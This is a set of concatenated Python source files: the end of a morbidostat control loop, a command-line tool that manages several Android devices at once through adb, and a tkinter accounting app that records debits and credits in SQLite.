# wait some period of time so that the total is time_between_ODs
if self.interval > time_between_ODs:
print('warning: loop took longer than requested OD interval')
time.sleep(time_between_ODs - self.interval)
#self.elapsed_loop_time += time_between_ODs
Morbidostat()
|
adb.py
|
#! /usr/bin/env python
# encoding: utf-8
# Copyright (c) 2015 Steinwurf ApS
# All Rights Reserved
#
# Distributed under the "BSD License". See the accompanying LICENSE.rst file.
import argparse
import subprocess
import threading
import time
import os
import re
BUTTONS = {
"soft_right": 2,
"home": 3,
"back": 4,
"call": 5,
"endcall": 6,
"0": 7,
"1": 8,
"2": 9,
"3": 10,
"4": 11,
"5": 12,
"6": 13,
"7": 14,
"8": 15,
"9": 16,
"star": 17,
"pound": 18,
"dpad_up": 19,
"dpad_down": 20,
"dpad_left": 21,
"dpad_right": 22,
"dpad_center": 23,
"volume_up": 24,
"volume_down": 25,
"power": 26,
"camera": 27,
"clear": 28,
"a": 29,
"b": 30,
"c": 31,
"d": 32,
"e": 33,
"f": 34,
"g": 35,
"h": 36,
"i": 37,
"j": 38,
"k": 39,
"l": 40,
"m": 41,
"n": 42,
"o": 43,
"p": 44,
"q": 45,
"r": 46,
"s": 47,
"t": 48,
"u": 49,
"v": 50,
"w": 51,
"x": 52,
"y": 53,
"z": 54,
"comma": 55,
"period": 56,
"alt_left": 57,
"alt_right": 58,
"shift_left": 59,
"shift_right": 60,
"tab": 61,
"space": 62,
"sym": 63,
"explorer": 64,
"envelope": 65,
"enter": 66,
"del": 67,
"grave": 68,
"minus": 69,
"equals": 70,
"left_bracket": 71,
"right_bracket": 72,
"backslash": 73,
"semicolon": 74,
"apostrophe": 75,
"slash": 76,
"at": 77,
"num": 78,
"headsethook": 79,
"focus": 80,
"plus": 81,
"menu": 82,
"notification": 83,
"search": 84
}
class Command(object):
"""Wrapper for Popen which supports a timeout."""
def __init__(self, cmd, timeout):
"""initialize command."""
super(Command, self).__init__()
self.cmd = cmd
self.timeout = timeout
self.process = None
self.result = None
def run(self):
"""Run command."""
def target():
self.process = subprocess.Popen(
self.cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.result = self.process.communicate()
thread = threading.Thread(
target=target,
name=" ".join(self.cmd))
thread.start()
thread.join(self.timeout)
if thread.is_alive():
print("Error: '{}' took too long.".format(
" ".join(self.cmd)))
self.process.terminate()
thread.join()
if self.result:
return (
self.result[0],
self.result[1],
self.process.returncode)
else:
return (None, None, None)
class ADB(object):
"""docstring for ADB."""
def __init__(self, adb, threads, specific_devices):
"""initialize ADB."""
super(ADB, self).__init__()
self.adb = adb
self.cmd_semaphore = threading.BoundedSemaphore(value=threads)
self.print_mutex = threading.Lock()
self.__run([self.adb, 'start-server'])
self.specific_devices = specific_devices
def __run(self, cmd, timeout=20, print_cmd=False):
stdout = None
stderr = None
returncode = None
try:
self.cmd_semaphore.acquire()
if print_cmd:
self.__print(" ".join(cmd))
command = Command(cmd, timeout)
stdout, stderr, returncode = command.run()
except Exception as e:
self.__print("Error: ".format(e.message, " ".join(cmd)))
finally:
if print_cmd and stdout:
self.__print(stdout.strip())
if print_cmd and stderr:
self.__print(stderr.strip())
self.cmd_semaphore.release()
return stdout, stderr, returncode
def __print(self, message):
self.print_mutex.acquire()
print(message)
self.print_mutex.release()
def __get_devices(self):
outputs, _, _ = self.__run([self.adb, 'devices'])
if not outputs:
return []
outputs = [i for i in outputs.split('\n')[1:] if i]
devices = {}
for output in outputs:
output = output.split()
device_id = output[0]
if device_id == '????????????':
print('device with insufficient permissions found.')
continue
if output[1] == 'unauthorized':
print('unauthorized device found.')
continue
if self.specific_devices:
if device_id not in self.specific_devices:
continue
devices[device_id] = {'handle': device_id}
return devices
def __get_prop(self, handle, prop):
cmd = [self.adb, '-s', handle, 'shell',
'getprop', prop]
result, _, _ = self.__run(cmd)
if not result:
return ""
return result.strip()
def __version(self, handle):
version_string = self.__get_prop(handle, 'ro.build.version.release')
if version_string == "7.0":
version_string = "7.0.0"
version_split = version_string.split('.')
if len(version_split) != 3:
return (0, 0, 0)
major, minor, patch = version_split
return (int(major), int(minor), int(patch))
def __ip(self, handle):
return self.__get_prop(handle, 'dhcp.wlan0.ipaddress')
def __serial(self, handle):
return self.__get_prop(handle, 'ro.serialno')
def __brand(self, handle):
return self.__get_prop(handle, 'ro.product.brand')
def __model(self, handle):
return self.__get_prop(handle, 'ro.product.model')
def __is_wifi_off(self, handle):
return self.__get_prop(handle, 'init.svc.dhcpcd_wlan0') == 'stopped'
def __battery(self, handle):
cmd = [self.adb, '-s', handle, 'shell',
'cat', '/sys/class/power_supply/battery/capacity']
result, _, _ = self.__run(cmd)
if not result or 'No such file or directory' in result:
return "-"
return result.strip()
def __is_screen_locked(self, handle):
cmd = [self.adb, '-s', handle, 'shell', 'dumpsys statusbar']
output, _, _ = self.__run(cmd)
if not output:
return True
output = output.strip()
result = 'mDisabled=0x1e00000' in output
result |= 'mDisabled1=0x3200000' in output
return result
def __is_screen_on(self, handle):
cmd = [self.adb, '-s', handle, 'shell', 'dumpsys power']
output, _, _ = self.__run(cmd)
if not output:
return False
output = output.strip()
result = 'mScreenOn=true' in output or \
'SCREEN_ON_BIT' in output or \
'Display Power: state=ON' in output
return result
def __screen_size(self, handle):
version = self.__version(handle)
if version[0] <= 4 and version[1] < 3:
cmd = [self.adb, '-s', handle, 'shell', 'dumpsys window windows']
output, stderr, _ = self.__run(cmd)
result = re.search("Display: init=(\d+)x(\d+)", output)
if result is None:
return (0, 0)
width = int(result.group(1))
height = int(result.group(2))
return (width, height)
cmd = [self.adb, '-s', handle, 'shell', 'wm size']
output, stderr, _ = self.__run(cmd)
result = re.search("Physical size: (\d+)x(\d+)", output)
if result is None:
return (0, 0)
width = int(result.group(1))
height = int(result.group(2))
return (width, height)
def __orientation(self, handle):
# Returns None or 0, 1, 2, or 3.
# 0 is potrait
# 1 is landscape
# 2 is potrait top down
# 3 is landscape top down
# This seems to fail occasionally, try a few time if we fail.
tries = 0
orientation = None
while orientation is None and tries < 10:
tries += 1
cmd = [self.adb, '-s', handle, 'shell', 'dumpsys input']
output, stderr, _ = self.__run(cmd)
for line in output.splitlines():
if 'SurfaceOrientation' in line:
orientation = int(line[-1])
break
else:
time.sleep(1)
if not orientation:
print("Error: Unable to find SurfaceOrientation, "
"I'm guessing landscape.")
return 1
return orientation
def __push(self, handle, local, remote):
cmd = [self.adb, '-s', handle, 'push', local, remote]
self.__run(cmd)
def __install(self, handle, apk):
apk = os.path.abspath(apk)
cmd = [self.adb, '-s', handle, 'install', '-r', apk]
return self.__run(cmd, timeout=40)
def __running(self, handle, package_name):
cmd = [self.adb, '-s', handle, 'shell', 'ps']
output, _, _ = self.__run(cmd)
return (handle, any(
[line.endswith(package_name) for line in output.splitlines()]))
def __is_off(self, handle):
# adb is set to unsecure when the table is off.
# It's unknown if this can happen in other situations.
is_adb_secure = self.__get_prop(handle, 'ro.adb.secure')
return is_adb_secure == '0'
def __has(self, handle, package_name):
cmd = [self.adb, '-s', handle, 'shell', 'pm list packages']
output, _, _ = self.__run(cmd)
result = any(
[line.endswith(package_name) for line in output.splitlines()])
return (handle, result)
def __uninstall(self, handle, package_name):
cmd = [self.adb, '-s', handle, 'uninstall', package_name]
self.__run(cmd, print_cmd=True)
def __stop(self, handle, package_name):
cmd = [self.adb, '-s', handle, 'shell',
'am', 'force-stop', package_name]
self.__run(cmd)
def __start(self, handle, package_name, activity='MainActivity',
action=None, data_string=None, parameters={}):
cmd = [self.adb, '-s', handle, 'shell', 'am', 'start', '-n']
cmd.append('{package_name}/.{activity}'.format(
package_name=package_name, activity=activity))
if data_string is not None:
cmd.append('-d {data_string}'.format(data_string=data_string))
if action is not None:
cmd.append('-a {action}'.format(action=action))
for parameter in parameters:
cmd.append('-e {key} {value}'.format(
key=parameter, value=parameters[parameter]))
self.__run(cmd)
def __press(self, handle, button):
key_id = str(BUTTONS[button])
cmd = [self.adb, '-s', handle, 'shell', 'input', 'keyevent', key_id]
self.__run(cmd)
def __shutdown(self, handle):
cmd = [self.adb, '-s', handle, 'shell', 'reboot', '-p']
self.__run(cmd)
def __reboot(self, handle):
cmd = [self.adb, '-s', handle, 'shell', 'reboot']
self.__run(cmd)
def __turn_on(self, handle):
if self.__is_off(handle):
self.__reboot(handle)
def __turn_screen(self, handle, turn):
screen = self.__is_screen_on(handle)
if screen != turn:
self.__press(handle, 'power')
def __unlock(self, handle):
self.__turn_screen(handle, True)
model = self.__model(handle)
if model in ["LG-E460", "SM-T555"]:
self.__swipe(handle, (100, 400), (300, 400))
return
if model == "T1-A21L":
_from = None
_to = None
orientation = self.__orientation(handle)
if orientation in [0, 2]:
# Potrait
_from = (400, 640)
_to = (800, 640)
elif orientation in [1, 3]:
# Landscape
_from = (100, 400)
_to = (1270, 400)
else:
print("ERROR, unable to get orientation!")
print(orientation)
self.__swipe(handle, _from, _to)
return
if model == "Nexus 4":
self.__swipe(handle, (300, 700), (300, 300))
return
# Try with menu button
self.__press(handle, 'menu')
def __tap(self, handle, location):
x, y = 0, 1
cmd = [self.adb, '-s', handle, 'shell',
'input', 'tap', str(location[x]), str(location[y])]
self.__run(cmd)
def __swipe(self, handle, start, end):
x, y = 0, 1
startx = start[x]
starty = start[y]
endx = end[x]
endy = end[y]
cmd = [self.adb, '-s', handle, 'shell',
'input', 'swipe',
str(startx), str(starty),
str(endx), str(endy)]
if self.__model(handle) != "LG-E460":
# duration in ms.
duration = 500
cmd += [str(duration)]
self.__run(cmd)
def __multithreaded_cmd(self, cmd, **kwargs):
devices = self.__get_devices()
threads = []
results = []
class FuncThread(threading.Thread):
def __init__(self, target, **kwargs):
self._target = target
self._kwargs = kwargs
self.result = None
threading.Thread.__init__(self)
def run(self):
self.result = self._target(**self._kwargs)
def join(self):
threading.Thread.join(self)
return self.result
print("running on {} devices.".format(len(devices)))
for d in devices:
t = FuncThread(target=cmd, handle=devices[d]["handle"], **kwargs)
t.start()
threads.append(t)
for thread in threads:
results.append(thread.join())
return results
def list_quick(self):
"""List the devices quickly."""
devices = self.__get_devices()
if not devices:
print("No devices detected.")
return
for d in devices:
print(d)
print("-" * 20)
print("total: {:3} device(s)".format(len(devices)))
def list(self):
"""List the devices."""
devices = self.__get_devices()
if not devices:
print("No devices detected.")
return
longest_line = 0
for d in sorted(devices.keys()):
handle = devices[d]['handle']
devices[d]['version'] = "{}.{}.{}".format(*self.__version(handle))
devices[d]['brand'] = self.__brand(handle)
devices[d]['model'] = self.__model(handle)
devices[d]['battery'] = self.__battery(handle)
if self.__is_off(devices[d]['handle']):
devices[d]['state'] = 'device off'
else:
screen_on = self.__is_screen_on(handle)
devices[d]['state'] = \
'screen on' if screen_on else 'screen off'
m = "{id:20} " \
"{brand:10} " \
"{model:12} " \
"{version:6} " \
"{battery:>3} % " \
"{state:3}".format(id=d, **devices[d])
print(m)
longest_line = max(longest_line, len(m))
lower_line = ("total: {:%s} device(s)" % (longest_line - 17)).format(
len(devices))
print("-" * len(lower_line))
print(lower_line)
def tap(self, location):
"""Tao on the screen."""
self.__multithreaded_cmd(self.__tap, location=location)
def swipe(self, start, end):
"""Swipe between two points."""
self.__multithreaded_cmd(self.__swipe, start=start, end=end)
def press(self, button):
"""Press a button."""
self.__multithreaded_cmd(self.__press, button=button)
def turn_screen(self, turn):
"""Turn the screen."""
self.__multithreaded_cmd(self.__turn_screen, turn=turn)
def install(self, apk):
"""Install apk."""
def cmd(handle, apk):
result = self.__install(handle, apk)
stdout = result[0].splitlines()
if stdout:
self.__print(stdout[-1])
else:
print(result[1])
self.__multithreaded_cmd(cmd, apk=apk)
def uninstall(self, package_name):
"""Uninstall package."""
self.__multithreaded_cmd(self.__uninstall, package_name=package_name)
def has(self, package_name):
"""Check if package is installed."""
state = self.__multithreaded_cmd(self.__has, package_name=package_name)
_id, has = 0, 1
result = [device[has] for device in state]
if all(result):
print("All the {} devices have {} installed.".format(
len(result), package_name))
return
print("{}/{} devices does not have {} installed:".format(
result.count(False),
len(result),
package_name))
for device in state:
if not device[has]:
print(" {}".format(device[_id]))
def running(self, package_name):
"""Check if application is running."""
state = self.__multithreaded_cmd(
self.__running, package_name=package_name)
_id, running = 0, 1
result = [device[running] for device in state]
if all(result):
print("All {} devices are running {}.".format(
len(result), package_name))
return
print("{}/{} devices are not running {}:".format(
result.count(False),
len(result),
package_name))
for device in state:
if not device[running]:
print(" {}".format(device[_id]))
def start(self, package_name, activity='MainActivity', action=None,
data_string=None, parameters={}):
"""Start application."""
self.__multithreaded_cmd(
self.__start, package_name=package_name, activity=activity,
action=action, data_string=data_string, parameters=parameters)
def stop(self, package_name):
"""Stop application."""
self.__multithreaded_cmd(self.__stop, package_name=package_name)
def restart(self, package_name):
"""Restart application."""
def cmd(handle, package_name):
self.__stop(handle, package_name=package_name)
self.__start(handle, package_name=package_name)
self.__multithreaded_cmd(cmd, package_name=package_name)
def shutdown(self):
"""Shutdown device."""
self.__multithreaded_cmd(self.__shutdown)
def turn_on(self):
"""Turn device on."""
self.__multithreaded_cmd(self.__turn_on)
def reboot(self):
"""Reboot device."""
self.__multithreaded_cmd(self.__reboot)
def unlock(self):
"""Unlock device."""
self.__multithreaded_cmd(self.__unlock)
def shell(self, arguments, log_type):
output_mutex = threading.Lock()
output = {}
def run_shell(handle):
cmd = [self.adb, '-s', handle, 'shell'] + arguments
out, err, ret = self.__run(cmd, timeout=None)
output_mutex.acquire()
output[handle] = out
output_mutex.release()
self.__multithreaded_cmd(run_shell)
def file_logging(handle, content):
fout = open("device_{id}.out".format(id=handle), 'w')
fout.write(content);
fout.close()
def stdout_logging(handle, content):
print("Device: {id}\nOutput:\n{entry}".format(id=handle,
entry=content))
for key, entry in output.items():
if log_type == 'none':
return
elif log_type == 'stdout':
stdout_logging(key, entry)
elif log_type == 'file':
file_logging(key, entry)
def main():
"""Main function."""
parser = argparse.ArgumentParser(
description='Handle multiple android devices simultaneously.')
parser.add_argument('--adb', help='path to adb', default="adb")
parser.add_argument(
'--threads', type=int, help='the number of threads to use', default=10)
parser.add_argument(
'-s',
'--specific_devices',
help='Specific devices',
default=[],
action="append",
nargs='?')
subparsers = parser.add_subparsers(
dest='command',
help='Sub-command help')
list_parser = subparsers.add_parser('list', help='List devices.')
list_parser.add_argument(
'-q', '--quick',
help="A quick list of connected devices.",
action='store_true')
shell_parser = subparsers.add_parser('shell', help="Run a shell command.")
shell_parser.add_argument(
'--log_type',
help="Specify the logging approach. NB: If file is specified, already "
"existing files will be overwritten.",
default='none',
choices=['none', 'stdout', 'file'])
shell_parser.add_argument(
'shell_command',
help='Command to be executed, including arguments',
nargs='+')
def coordinate(input):
try:
x, y = map(int, input.split(','))
return x, y
except:
raise argparse.ArgumentTypeError("Coordinates must be x,y")
tap_parser = subparsers.add_parser(
'tap',
help='Simulate a tap on the screen.')
tap_parser.add_argument(
'location',
help="Coordinate (x,y)",
type=coordinate)
swipe_parser = subparsers.add_parser(
'swipe',
help='Simulate a swipe on the screen.')
swipe_parser.add_argument(
'start',
help="The beginning of the swipe (x,y)",
type=coordinate)
swipe_parser.add_argument(
'end',
help="The end of the swipe (x,y)",
type=coordinate)
press_parser = subparsers.add_parser('press', help="Press a button.")
press_parser.add_argument(
'button',
help="Button to press.",
choices=BUTTONS.keys())
subparsers.add_parser('shutdown', help="Shutdown device(s).")
subparsers.add_parser('turn_on', help="Turn on device(s).")
subparsers.add_parser('reboot', help="Reboot device(s).")
screen_parser = subparsers.add_parser('screen', help="Control screen.")
turn_values = {'on': True, 'off': False}
screen_parser.add_argument(
'turn',
choices=turn_values.keys(),
help='Turn the screen on or off.')
install_parser = subparsers.add_parser('install', help='Install APK.')
install_parser.add_argument('apk', help="APK to install.", nargs='?')
uninstall_parser = subparsers.add_parser(
'uninstall',
help="Uninstall application.")
uninstall_parser.add_argument(
'package_name',
help='Package name of the application to uninstall')
has_parser = subparsers.add_parser(
'has',
help="Check if a certain application is installed.")
has_parser.add_argument(
'package_name',
help='Package name of the application to check')
running_parser = subparsers.add_parser(
'running',
help="Check if a certain application is running.")
running_parser.add_argument(
'package_name',
help='Package name of the application to check')
start_parser = subparsers.add_parser('start', help="Start application.")
start_parser.add_argument(
'package_name',
help='Package name of the application to start')
start_parser.add_argument(
'--activity',
default='MainActivity',
help='Activity name of the application to start')
start_parser.add_argument(
'--action',
default='',
help='Action of the application to start')
start_parser.add_argument(
'-d', '--data_string',
default='',
help='data string to pass to the application')
start_parser.add_argument(
'-e', '--extras', metavar='key=value',
nargs='*',
default='',
help='data string to pass to the application')
stop_parser = subparsers.add_parser('stop', help="Stop application.")
stop_parser.add_argument(
'package_name',
help='Package name of the application to stop')
restart_parser = subparsers.add_parser(
'restart', help="Restart application.")
restart_parser.add_argument(
'package_name',
help='Package name of the application to restart')
subparsers.add_parser('unlock', help="Unlocks the screen. Note, this "
"command only works on Huawei "
"T1_A21L units.")
args = parser.parse_args()
adb = ADB(args.adb, args.threads, args.specific_devices)
if 'extras' in dir(args):
args.extras = \
{extra.split('=')[0]: extra.split('=')[1] for extra in args.extras}
{
'list': lambda args: adb.list_quick() if args.quick else adb.list(),
'tap': lambda args: adb.tap(args.location),
'swipe': lambda args: adb.swipe(args.start, args.end),
'press': lambda args: adb.press(args.button),
'shutdown': lambda args: adb.shutdown(),
'turn_on': lambda args: adb.turn_on(),
'reboot': lambda args: adb.reboot(),
'screen': lambda args: adb.turn_screen(turn_values[args.turn]),
'install': lambda args: adb.install(args.apk),
'uninstall': lambda args: adb.uninstall(args.package_name),
'has': lambda args: adb.has(args.package_name),
'running': lambda args: adb.running(args.package_name),
'start': lambda args: adb.start(args.package_name, args.activity,
args.action, args.data_string,
args.extras),
'stop': lambda args: adb.stop(args.package_name),
'shell': lambda args: adb.shell(args.shell_command, args.log_type),
'restart': lambda args: adb.restart(args.package_name),
'unlock': lambda args: adb.unlock()
}[args.command](args)
if __name__ == '__main__':
main()
|
Audit_main_screen.py
|
#time module
import time
import datetime
start = time.time()
#gui module
from tkinter import *
from tkinter import messagebox
from tkinter import ttk
#system modules
import sys
import os
import threading
from termcolor import colored
#data processing and other data receiving modules
import sqlite3
from PIL import Image,ImageTk
from Audit_graph import graph_canvas
from Tally_people import advanced_data
import webbrowser
from Tally_viewer import viewer_api
import json
from Audit_upload import upload_to_cloud
#own module for variables and other settings
from Tally_date import date
from styling import *
from Tally_settings import setting
from user_config_window import check_user
'''
failed module need to be replace
None
'''
def window_start():
#check user settings and start window
check_user()
print(colored("Audit future has started","green"))
window_ = Tk()
window_.title("Audit-Future" + " " + str(version))
window_.geometry("1350x700")
window_.config(bg=window_colour)
window_.iconbitmap(image_icon_main_window)
#place all the elements in the window
def put_the_elements():
window = Canvas(window_,bg=bg,border=0,highlightthickness=1, highlightbackground=bg)
window.pack(fill=BOTH,expand=True)
with open(user_database,"r") as read_file:
d = json.load(read_file)
def remove_text(element):
element.delete(0,END)
frame_debit = LabelFrame(window,text="Debited/Credited",bg=bg,fg=fg,border=5,font=(font,16))
frame_debit.grid(row=3,column=0,columnspan=1,rowspan=10,pady=20,padx=100)
if status_down == True:
window_branding = Label(window,bg=bg,fg=fg,font=(font,30),text=company_name)
window_branding.grid(row=1,column=2,sticky=W,columnspan=1,pady=10)
label_for_add_todays_details = Label(window,text="ADD TODAY'S REPORT",bg = bg , fg= fg)
label_for_add_todays_details.grid(row=2,column=1,columnspan=3,padx=10,pady=10)
label_for_add_todays_details.config(font=(font,20))
textbox_for_date = Entry(frame_debit,width=20)
textbox_for_date.grid(row=1,column=0,padx=10,pady=10)
textbox_for_date.config(bg=textbox_bg,fg=textbox_fg,insertbackground=insert_fg)
textbox_for_date.insert(0,"YYYY/MM/DD")
textbox_for_date.bind("<Button-1>",lambda x: remove_text(textbox_for_date))
text_box_for_name = Entry(frame_debit,width=20)
text_box_for_name.grid(row=2,column=0,padx=10,pady=10)
text_box_for_name.config(bg=textbox_bg,fg=textbox_fg,insertbackground=insert_fg)
text_box_for_name.insert(0,"Name")
text_box_for_name.bind("<Button-1>",lambda x: remove_text(text_box_for_name))
textbox_for_amount = Entry(frame_debit,width=20)
textbox_for_amount.grid(row=6,column=0,pady=10,padx=0)
textbox_for_amount.config(bg=textbox_bg,fg=textbox_fg,insertbackground=insert_fg)
textbox_for_amount.insert(0,"Amount")
textbox_for_amount.bind("<Button-1>",lambda x: remove_text(textbox_for_amount))
textbox_for_category = Entry(frame_debit,width=20)
textbox_for_category.grid(row=3,column=0,padx=20,pady=10)
textbox_for_category.config(bg=textbox_bg,fg=textbox_fg,insertbackground=insert_fg)
textbox_for_category.insert(0,"Category")
textbox_for_category.bind("<Button-1>",lambda x: remove_text(textbox_for_category))
clicked = StringVar()
chooose_option = ttk.Combobox(frame_debit,textvariable=clicked)
chooose_option['values'] = ("Credited","Debited","select")
chooose_option.config(width=15)
chooose_option.current(2)
chooose_option.grid(row=5,column=0,padx=10,pady=10)
if status_down == True:
status = Label(window,bd=1,height=30,relief=SUNKEN,bg=bg)
status.grid(row=24,column=0,columnspan=10,sticky=W+E,padx=20)
comapany_name_label = Label(status,bg=bg,fg=fg,font=(font,20),text=company_name)
comapany_name_label.grid(row=0,column=0,sticky=W+E)
comapany_phone_label = Label(status,bg=bg,fg=fg,font=(font,20),text=company_phone)
comapany_phone_label.grid(row=0,column=1,sticky=W+E)
comapany_mail_label = Label(status,bg=bg,fg=fg,font=(font,20),text=company_mail)
comapany_mail_label.grid(row=0,column=2,sticky=W+E)
textbox_for_site = Entry(frame_debit,width=20)
textbox_for_site.grid(row=4,column=0,padx=10,pady=10)
textbox_for_site.config(bg=textbox_bg,fg=textbox_fg,insertbackground=insert_fg)
textbox_for_site.insert(0,"Site No")
textbox_for_site.bind("<Button-1>",lambda x: remove_text(textbox_for_site))
top_status = Label(window,bd=1,bg=bg,fg=fg,font=font)
top_status.grid(row=0,column=0,sticky=W+E,columnspan=12)
#main window reload function
def reload_main_window():
window.destroy()
window_start()
img = Image.open(image_back) # PIL solution
img = img.resize((50, 50), Image.ANTIALIAS) #The (250, 250) is (height, width)
img = ImageTk.PhotoImage(img) # convert to PhotoImage
global i
i = 0
global x
x = 0
def insert_into_database():
i = 0
type_payement = str(clicked.get())
date_entered = str(textbox_for_date.get())
name_entered = str(text_box_for_name.get())
site_entered = str(textbox_for_site.get())
amount_entered = int(textbox_for_amount.get())
category_entered = textbox_for_category.get()
if date_entered == "YYYY/MM/DD":
date_entered = date
if name_entered == "Name":
label_for_error = Label(window,text="Please enter a valid name")
label_for_error.grid(row=4,column=3,columnspan=4)
label_for_error.config(bg=bg,fg=fg,font=font)
i += 1
elif name_entered != "Name":
label_for_error = Label(window,bg=bg,fg=fg,font=font,text=" ")
label_for_error.grid(row=4,column=3,columnspan=4)
i = 0
if type_payement == "select":
label_for_error = Label(window,text="Please select a valid type of payement")
label_for_error.grid(row=5,column=1)
label_for_error.config(bg=bg,fg=fg,font=font)
i += 1
elif type_payement != "select":
label_for_error = Label(window,bg=bg,fg=fg,font=font,text=" ")
label_for_error.grid(row=5,column=1,columnspan=4)
if i == 0:
time_ = datetime.datetime.now()
def insert_final_database():
conn = sqlite3.connect(DEFAULT_PATH)
c = conn.cursor()
try:
conn.execute('''CREATE TABLE IF NOT EXISTS TALLY(date TEXT,
name TEXT,
amount INT,
category TEXT,
payement TEXT,
site TEXT,
time TEXT)''')
except Exception as e:
print(e)
c.execute('INSERT INTO TALLY (date , name , amount , category, payement, site,time) VALUES(?, ? ,? , ?, ?, ?, ?)',(date_entered,name_entered,amount_entered,category_entered,type_payement,site_entered,time_))
conn.commit()
c.close()
conn.close()
insert_final_database()
button_to_put_todays_details = Button(frame_debit,text="ADD",bg=button_bg,fg=button_fg,command=insert_into_database)
button_to_put_todays_details.grid(row=7,column=0,pady=10)
button_to_put_todays_details.config(font=font)
label_for_date = Label(window,text=date,bg=bg,fg=fg,font=(font,30))
label_for_date.grid(row=2,column=0,columnspan=1)
label_for_date.config(font=font)
#an unnecessary quit function
def quit():
def sure_quit():
sys.exit()
response1 = messagebox.askyesno("EXIT","Are you sure you want to quit?")
if response1 == 1:
sure_quit()
elif response1 == 0:
pass
#search the database from the main window by takuing the values to search from here
#and giving it to the search api
def search_function():
database_search_window = LabelFrame(window,text="Search",bg=bg,fg=fg,border=5,font=(font,16))
database_search_window.grid(row=3,column=2,columnspan=1,rowspan=10,pady=20,padx=100)
def search():
provided_date = str(textbox_search_date.get())
provided_name = str(textbox_search_name.get())
provided_amount = str(textbox_search_amount.get())
provided_category = str(textbox_search_category.get())
provided_payement = str(payement_search_result.get())
provided_site = str(textbox_for_site_search.get())
if provided_payement == "select":
provided_payement = "Payement"
viewer_api(date1=provided_date,amount1=provided_amount,payement1=provided_payement,site1=provided_site,name1=provided_name,category1=provided_category,file=str(DEFAULT_PATH))
textbox_search_date = Entry(database_search_window,width=20)
textbox_search_date.grid(row=0,column=0,padx=10,pady=10)
textbox_search_date.config(bg=textbox_bg,fg=textbox_fg,insertbackground=insert_fg)
textbox_search_date.insert(0,"Date")
textbox_search_date.bind("<Button-1>",lambda x: remove_text(textbox_search_date))
textbox_search_name = Entry(database_search_window,width=20)
textbox_search_name.grid(row=1,column=0,padx=10,pady=10)
textbox_search_name.config(bg=textbox_bg,fg=textbox_fg,insertbackground=insert_fg)
textbox_search_name.insert(0,"Name")
textbox_search_name.bind("<Button-1>",lambda x: remove_text(textbox_search_name))
textbox_search_amount = Entry(database_search_window,width=20)
textbox_search_amount.grid(row=5,column=0,pady=10,padx=0)
textbox_search_amount.config(bg=textbox_bg,fg=textbox_fg,insertbackground=insert_fg)
textbox_search_amount.insert(0,"Amount")
textbox_search_amount.bind("<Button-1>",lambda x: remove_text(textbox_search_amount))
textbox_search_category = Entry(database_search_window,width=20)
textbox_search_category.grid(row=2,column=0,padx=20,pady=10)
textbox_search_category.config(bg=textbox_bg,fg=textbox_fg,insertbackground=insert_fg)
textbox_search_category.insert(0,"Category")
textbox_search_category.bind("<Button-1>",lambda x: remove_text(textbox_search_category))
payement_search_result = StringVar()
payement_search_result.set("select")
textbox_for_site_search = Entry(database_search_window,width=20)
textbox_for_site_search.grid(row=3,column=0,padx=10,pady=10)
textbox_for_site_search.config(bg=textbox_bg,fg=textbox_fg,insertbackground=insert_fg)
textbox_for_site_search.insert(0,"Site")
textbox_for_site_search.bind("<Button-1>",lambda x: remove_text(textbox_for_site_search))
payement_search = ttk.Combobox(database_search_window,textvariable=payement_search_result)
payement_search['values'] = ("Credited","Debited","select")
payement_search.current(2)
payement_search.grid(row=4,column=0)
payement_search.config(width=15)
button_search = Button(database_search_window,bg=button_bg,fg=button_fg,font=font,text="Search",command=search)
button_search.grid(row=6,column=0,pady=10)
#open the audit viewer
def view():
viewer_api()
def delete():
database_delete_window = LabelFrame(window,text="DELETE",bg=bg,fg=fg,border=5,font=(font,16))
database_delete_window.grid(row=3,column=4,columnspan=1,rowspan=10,pady=20,padx=100)
textbox_get_date = Entry(database_delete_window,width=20)
textbox_get_date.grid(row=0,column=0,padx=10,pady=10)
textbox_get_date.config(bg=textbox_bg,fg=textbox_fg,insertbackground=insert_fg)
textbox_get_date.insert(0,"YYYY/MM/DD")
textbox_get_date.bind("<Button-1>",lambda x: remove_text(textbox_get_date))
text_box_get_name = Entry(database_delete_window,width=20)
text_box_get_name.grid(row=1,column=0,padx=10,pady=10)
text_box_get_name.config(bg=textbox_bg,fg=textbox_fg,insertbackground=insert_fg)
text_box_get_name.insert(0,"Name")
text_box_get_name.bind("<Button-1>",lambda x: remove_text(text_box_get_name))
textbox_get_amount = Entry(database_delete_window,width=20)
textbox_get_amount.grid(row=5,column=0,pady=10,padx=0)
textbox_get_amount.config(bg=textbox_bg,fg=textbox_fg,insertbackground=insert_fg)
textbox_get_amount.insert(0,"₹")
textbox_get_amount.bind("<Button-1>",lambda x: remove_text(textbox_get_amount))
textbox_get_category = Entry(database_delete_window,width=20)
textbox_get_category.grid(row=2,column=0,padx=20,pady=10)
textbox_get_category.config(bg=textbox_bg,fg=textbox_fg,insertbackground=insert_fg)
textbox_get_category.insert(1,"Category")
textbox_get_category.bind("<Button-1>",lambda x: remove_text(textbox_get_category))
clicked_get = StringVar()
chooose_get_option = ttk.Combobox(database_delete_window,textvariable=clicked_get)
chooose_get_option['values'] = ("Credited","Debited","select")
chooose_get_option.config(width=15)
chooose_get_option.current(2)
chooose_get_option.grid(row=4,column=0,padx=10,pady=10)
textbox_for_site_delete = Entry(database_delete_window,width=20)
textbox_for_site_delete.grid(row=3,column=0,padx=10,pady=10)
textbox_for_site_delete.config(bg=textbox_bg,fg=textbox_fg,insertbackground=insert_fg)
textbox_for_site_delete.insert(0,"Site No")
textbox_for_site_delete.bind("<Button-1>",lambda x: remove_text(textbox_for_site_delete))
def delete_final():
date_to_delete = str(textbox_get_date.get())
name_to_delete = str(text_box_get_name.get())
amount_to_delete = int(textbox_get_amount.get())
category_to_delete = str(textbox_get_category.get())
clicked_to_delete = str(clicked_get.get())
textbox_of_site_delete = str(textbox_for_site_delete.get())
conn = sqlite3.connect(DEFAULT_PATH)
c = conn.cursor()
c.execute('DELETE FROM TALLY WHERE date=? AND name=? AND amount=? AND category=? AND payement=? AND site=?',(date_to_delete,name_to_delete,amount_to_delete,category_to_delete,clicked_to_delete,textbox_of_site_delete))
conn.commit()
conn.close()
delete_button_final = Button(database_delete_window,text="Delete",bg=button_bg,fg=button_fg,font=font,command=delete_final)
delete_button_final.grid(row=6,column=0)
def grapher():
graph_window = Toplevel()
graph_window.config(bg=bg)
graph_window.geometry("200x200")
def credited():
threading.Thread(target=graph("Credited")).start()
def calculator():
try:
os.system("open -a calculator")
except:
os.system("calc")
def help_open():
try:
webbrowser.open(help_path)
except:
messagebox.showerror("Error","Couldn't find a browser/file")
